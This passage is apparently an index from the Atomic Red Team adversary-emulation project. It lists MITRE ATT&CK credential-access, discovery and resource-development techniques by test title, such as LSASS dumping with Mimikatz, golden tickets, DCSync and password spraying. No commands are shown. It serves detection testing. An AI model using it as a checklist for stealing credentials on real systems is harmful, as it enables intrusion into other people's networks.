- Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
- Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #7: LSASS read with pypykatz [windows]
- Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- Atomic Test #10: Powershell Mimikatz [windows]
- Atomic Test #11: Dump LSASS with createdump.exe from .Net v5 [windows]
- Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #1: Password Spray all Domain Users [windows]
- Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
- Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
- Atomic Test #5: WinPwn - DomainPasswordSpray Attacks [windows]
- Atomic Test #6: Password Spray Invoke-DomainPasswordSpray Light [windows]
- Atomic Test #7: Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365) [azure-ad]
- Atomic Test #8: Password Spray using Kerbrute Tool [windows]
- Atomic Test #9: AWS - Password Spray an AWS using GoAWSConsoleSpray [iaas:aws]
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.005 OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md)
- Atomic Test #1: Cached Credential Dump via Cmdkey [windows]
- [T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md)
- Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
- Atomic Test #2: Crafting Active Directory golden tickets with Rubeus [windows]
- [T1649 Steal or Forge Authentication Certificates](../../T1649/T1649.md)
- Atomic Test #1: Staging Local Certificates via Export-Certificate [windows]
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Find AWS credentials [macos, linux]
- Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #3: Extract passwords with grep [macos, linux]
- Atomic Test #4: Extracting passwords with findstr [windows]
- Atomic Test #5: Access unattend.xml [windows]
- Atomic Test #6: Find and Access Github Credentials [macos, linux]
- Atomic Test #7: WinPwn - sensitivefiles [windows]
- Atomic Test #8: WinPwn - Snaffler [windows]
- Atomic Test #9: WinPwn - powershellsensitive [windows]
- Atomic Test #10: WinPwn - passhunt [windows]
- Atomic Test #11: WinPwn - SessionGopher [windows]
- Atomic Test #12: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1528 Steal Application Access Token](../../T1528/T1528.md)
- Atomic Test #1: Azure - Dump All Azure Key Vaults with Microburst [iaas:azure]
- [T1552.006 Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md)
- Atomic Test #1: GPP Passwords (findstr) [windows]
- Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1141 Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552.008 Chat Messages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1142 Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
- Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
- Atomic Test #3: Brute Force:Credential Stuffing using Kerbrute Tool [windows]
- T1208 Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1187 Forced Authentication](../../T1187/T1187.md)
- Atomic Test #1: PetitPotam [windows]
- Atomic Test #2: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS [windows]
- T1174 Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md)
- Atomic Test #1: Access /etc/shadow (Local) [linux]
- Atomic Test #2: Access /etc/passwd (Local) [linux]
- Atomic Test #3: Access /etc/{shadow,passwd} with a standard bin that's not cat [linux]
- Atomic Test #4: Access /etc/{shadow,passwd} with shell builtins [linux]
- [T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md)
- Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows]
- [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
- Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
- Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.003 OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md)
- Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows]
- Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
- Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
- Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
- Atomic Test #5: Create Volume Shadow Copy remotely with WMI [windows]
- Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
- Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
- Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
- [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
- Atomic Test #1: Request for service tickets [windows]
- Atomic Test #2: Rubeus kerberoast [windows]
- Atomic Test #3: Extract all accounts in use as SPN using setspn [windows]
- Atomic Test #4: Request A Single Ticket via PowerShell [windows]
- Atomic Test #5: Request All Tickets via PowerShell [windows]
- Atomic Test #6: WinPwn - Kerberoasting [windows]
- Atomic Test #7: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
- [T1003.006 OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md)
- Atomic Test #1: DCSync (Active Directory) [windows]
- Atomic Test #2: Run DSInternals Get-ADReplAccount [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.004 Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- [T1552.007 Kubernetes List Secrets](../../T1552.007/T1552.007.md)
- Atomic Test #1: List All Secrets [containers]
- Atomic Test #2: ListSecrets [containers]
- Atomic Test #3: Cat the contents of a Kubernetes service account token file [linux]
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #1: System Owner/User Discovery [windows]
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
- Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
- Atomic Test #5: GetCurrent User with PowerShell Script [windows]
- Atomic Test #6: System Discovery - SocGholish whoami [windows]
- [T1613 Container and Resource Discovery](../../T1613/T1613.md)
- Atomic Test #1: Container and ResourceDiscovery [containers]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1615 Group Policy Discovery](../../T1615/T1615.md)
- Atomic Test #1: Display group policy information via gpresult [windows]
- Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows]
- Atomic Test #3: WinPwn - GPOAudit [windows]
- Atomic Test #4: WinPwn - GPORemoteAccessPolicy [windows]
- Atomic Test #5: MSFT Get-GPO Cmdlet [windows]
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
- Atomic Test #1: Enumerate all accounts (Domain) [windows]
- Atomic Test #2: Enumerate all accounts via PowerShell (Domain) [windows]
- Atomic Test #3: Enumerate logged on users via CMD (Domain) [windows]
- Atomic Test #4: Automated AD Recon (ADRecon) [windows]
- Atomic Test #5: Adfind -Listing password policy [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Admins [windows]
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
- Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
- Atomic Test #11: Get-DomainUser with PowerView [windows]
- Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
- Atomic Test #13: Enumerate Linked Policies In ADSISearcher Discovery [windows]
- Atomic Test #14: Enumerate Root Domain linked policies Discovery [windows]
- Atomic Test #15: WinPwn - generaldomaininfo [windows]
- Atomic Test #16: Kerbrute - userenum [windows]
- Atomic Test #17: Wevtutil - Discover NTLM Users Remote [windows]
- Atomic Test #18: Suspicious LAPS Attributes Query with Get-ADComputer all properties [windows]
- Atomic Test #19: Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property [windows]
- Atomic Test #20: Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope [windows]
- Atomic Test #21: Suspicious LAPS Attributes Query with adfind all properties [windows]
- Atomic Test #22: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd [windows]
- T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #1: Enumerate all accounts (Local) [linux]
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #5: Show if a user account has ever logged in remotely [linux]
- Atomic Test #6: Enumerate users and groups [linux, macos]
- Atomic Test #7: Enumerate users and groups [macos]
- Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
- Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
- Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- [T1069.002 Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
- Atomic Test #3: Elevated group enumeration using net group (Domain) [windows]
- Atomic Test #4: Find machines where user has local admin access (PowerView) [windows]
- Atomic Test #5: Find local admins on all machines in domain (PowerView) [windows]
- Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
- Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
- Atomic Test #8: Adfind - Query Active Directory Groups [windows]
- Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
- Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
- Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
- Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
- Atomic Test #13: Get-DomainGroup with PowerView [windows]
- Atomic Test #14: Active Directory Enumeration with LDIFDE [windows]
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #1: System Service Discovery [windows]
- Atomic Test #2: System Service Discovery - net.exe [windows]
- Atomic Test #3: System Service Discovery - systemctl [linux]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- Atomic Test #5: Windows Internal pktmon capture [windows]
- Atomic Test #6: Windows Internal pktmon set filter [windows]
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #9: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
- Atomic Test #10: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
- Atomic Test #11: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #1: Network Share Discovery [macos]
- Atomic Test #2: Network Share Discovery - linux [linux]
- Atomic Test #3: Network Share Discovery command prompt [windows]
- Atomic Test #4: Network Share Discovery PowerShell [windows]
- Atomic Test #5: View available share drives [windows]
- Atomic Test #6: Share Discovery with PowerView [windows]
- Atomic Test #7: PowerView ShareFinder [windows]
- Atomic Test #8: WinPwn - shareenumeration [windows]
- Atomic Test #9: Network Share Discovery via dir command [windows]
- [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
- Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
- Atomic Test #2: WinPwn - printercheck [windows]
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #2: System Information Discovery [macos]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- Atomic Test #6: Hostname Discovery (Windows) [windows]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #8: Windows MachineGUID Discovery [windows]
- Atomic Test #9: Griffon Recon [windows]
- Atomic Test #10: Environment variables discovery on windows [windows]
- Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
- Atomic Test #12: Show System Integrity Protection status (MacOS) [macos]
- Atomic Test #13: WinPwn - winPEAS [windows]
- Atomic Test #14: WinPwn - itm4nprivesc [windows]
- Atomic Test #15: WinPwn - Powersploits privesc checks [windows]
- Atomic Test #16: WinPwn - General privesc checks [windows]
- Atomic Test #17: WinPwn - GeneralRecon [windows]
- Atomic Test #18: WinPwn - Morerecon [windows]
- Atomic Test #19: WinPwn - RBCD-Check [windows]
- Atomic Test #20: WinPwn - PowerSharpPack - Watson searching for missing windows patches [windows]
- Atomic Test #21: WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors [windows]
- Atomic Test #22: WinPwn - PowerSharpPack - Seatbelt [windows]
- Atomic Test #23: Azure Security Scan with SkyArk [azure-ad]
- Atomic Test #24: Linux List Kernel Modules [linux]
- Atomic Test #25: System Information Discovery with WMIC [windows]
- [T1010 Application Window Discovery](../../T1010/T1010.md)
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1580 Cloud Infrastructure Discovery](../../T1580/T1580.md)
- Atomic Test #1: AWS - EC2 Enumeration from Cloud Instance [linux, macos]
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
- Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
- Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
- Atomic Test #4: List Google Chrome / Opera Bookmarks on Windows with powershell [windows]
- Atomic Test #5: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt [windows]
- Atomic Test #6: List Mozilla Firefox bookmarks on Windows with command prompt [windows]
- Atomic Test #7: List Internet Explorer Bookmarks using the command prompt [windows]
- Atomic Test #8: List Safari Bookmarks on MacOS [macos]
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #1: System Network Configuration Discovery on Windows [windows]
- Atomic Test #2: List Windows Firewall Rules [windows]
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows]
- Atomic Test #5: List Open Egress Ports [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows]
- Atomic Test #7: Qakbot Recon [windows]
- Atomic Test #8: List macOS Firewall Rules [macos]
- Atomic Test #9: DNS Server Discovery Using nslookup [windows]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1482 Domain Trust Discovery](../../T1482/T1482.md)
- Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
- Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
- Atomic Test #3: Powershell enumerate domains and forests [windows]
- Atomic Test #4: Adfind - Enumerate Active Directory OUs [windows]
- Atomic Test #5: Adfind - Enumerate Active Directory Trusts [windows]
- Atomic Test #6: Get-DomainTrust with PowerView [windows]
- Atomic Test #7: Get-ForestTrust with PowerView [windows]
- Atomic Test #8: TruffleSnout - Listing AD Infrastructure [windows]
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
- Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
- Atomic Test #3: Nix File and Directory Discovery [macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux]
- Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
- Atomic Test #6: Launch DirLister Executable [windows]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #1: System Network Connections Discovery [windows]
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- Atomic Test #4: System Discovery using SharpView [windows]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
- Atomic Test #1: AWS S3 Enumeration [iaas:azure]
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [macos, linux]
- Atomic Test #2: Process Discovery - tasklist [windows]
- Atomic Test #3: Process Discovery - Get-Process [windows]
- Atomic Test #4: Process Discovery - get-wmiObject [windows]
- Atomic Test #5: Process Discovery - wmic process [windows]
- Atomic Test #6: Discover Specific Process - tasklist [windows]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #1: Permission Groups Discovery (Local) [macos, linux]
- Atomic Test #2: Basic Permission Groups Discovery Windows (Local) [windows]
- Atomic Test #3: Permission Groups Discovery PowerShell (Local) [windows]
- Atomic Test #4: SharpHound3 - LocalAdmin [windows]
- Atomic Test #5: Wmic Group Discovery [windows]
- Atomic Test #6: WMIObject Group Discovery [windows]
- Atomic Test #7: Permission Groups Discovery for Containers- Local Groups [containers]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
- Atomic Test #2: Examine password complexity policy - CentOS/RHEL 7.x [linux]
- Atomic Test #3: Examine password complexity policy - CentOS/RHEL 6.x [linux]
- Atomic Test #4: Examine password expiration policy - All Linux [linux]
- Atomic Test #5: Examine local password policy - Windows [windows]
- Atomic Test #6: Examine domain password policy - Windows [windows]
- Atomic Test #7: Examine password policy - macOS [macos]
- Atomic Test #8: Get-DomainPolicy with PowerView [windows]
- Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
- Atomic Test #10: Use of SecEdit.exe to export the local security policy (including the password policy) [windows]
- Atomic Test #11: Examine AWS Password Policy [iaas:aws]
- [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
- Atomic Test #1: Discover System Language by Registry Query [windows]
- Atomic Test #2: Discover System Language with chcp [windows]
- Atomic Test #3: Discover System Language with locale [linux]
- Atomic Test #4: Discover System Language with localectl [linux]
- Atomic Test #5: Discover System Language by locale file [linux]
- Atomic Test #6: Discover System Language by Environment Variable Query [linux]
- [T1012 Query Registry](../../T1012/T1012.md)
- Atomic Test #1: Query Registry [windows]
- Atomic Test #2: Query Registry with Powershell cmdlets [windows]
- Atomic Test #3: Enumerate COM Objects in Registry with Powershell [windows]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
- Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
- Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
- Atomic Test #5: Security Software Discovery - Sysmon Service [windows]
- Atomic Test #6: Security Software Discovery - AV Discovery via WMI [windows]
- [T1526 Cloud Service Discovery](../../T1526/T1526.md)
- Atomic Test #1: Azure - Dump Subscription Data with MicroBurst [iaas:azure]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #1: Remote System Discovery - net [windows]
- Atomic Test #2: Remote System Discovery - net group Domain Computers [windows]
- Atomic Test #3: Remote System Discovery - nltest [windows]
- Atomic Test #4: Remote System Discovery - ping sweep [windows]
- Atomic Test #5: Remote System Discovery - arp [windows]
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- Atomic Test #8: Remote System Discovery - nslookup [windows]
- Atomic Test #9: Remote System Discovery - adidnsdump [windows]
- Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
- Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
- Atomic Test #12: Remote System Discovery - ip neighbour [linux]
- Atomic Test #13: Remote System Discovery - ip route [linux]
- Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
- Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
- Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
- Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
- Atomic Test #18: Get-DomainController with PowerView [windows]
- Atomic Test #19: Get-WmiObject to Enumerate Domain Controllers [windows]
- Atomic Test #20: Remote System Discovery - net group Domain Controller [windows]
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- Atomic Test #3: Port Scan NMap for Windows [windows]
- Atomic Test #4: Port Scan using python [windows]
- Atomic Test #5: WinPwn - spoolvulnscan [windows]
- Atomic Test #6: WinPwn - MS17-10 [windows]
- Atomic Test #7: WinPwn - bluekeep [windows]
- Atomic Test #8: WinPwn - fruit [windows]
- Atomic Test #9: Network Service Discovery for Containers [containers]
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
- Atomic Test #3: Find and Display Safari Browser Version [macos]
- Atomic Test #4: WinPwn - Dotnetsearch [windows]
- Atomic Test #5: WinPwn - DotNet [windows]
- Atomic Test #6: WinPwn - powerSQL [windows]
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1124 System Time Discovery](../../T1124/T1124.md)
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
- Atomic Test #3: System Time Discovery in macOS [macos]
- Atomic Test #4: System Time Discovery W32tm as a Delay [windows]
- Atomic Test #5: System Time with Windows time Command [windows]
# resource-development
- T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.007 Serverless [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.008 Malvertising [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.004 Digital Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.002 DNS Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.003 Digital Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.001 Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.006 Vulnerabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.005 Botnet [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.004 Drive-by Target [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.002 Code Signing Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.003 Virtual Private Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586.003 Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586.002 Email Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.001 Upload Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.001 Domains [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.002 Upload Tool [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.004 Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1585.002 Email Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.001 Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584 Compromise Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586 Compromise Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.005 Botnet [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608 Stage Capabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
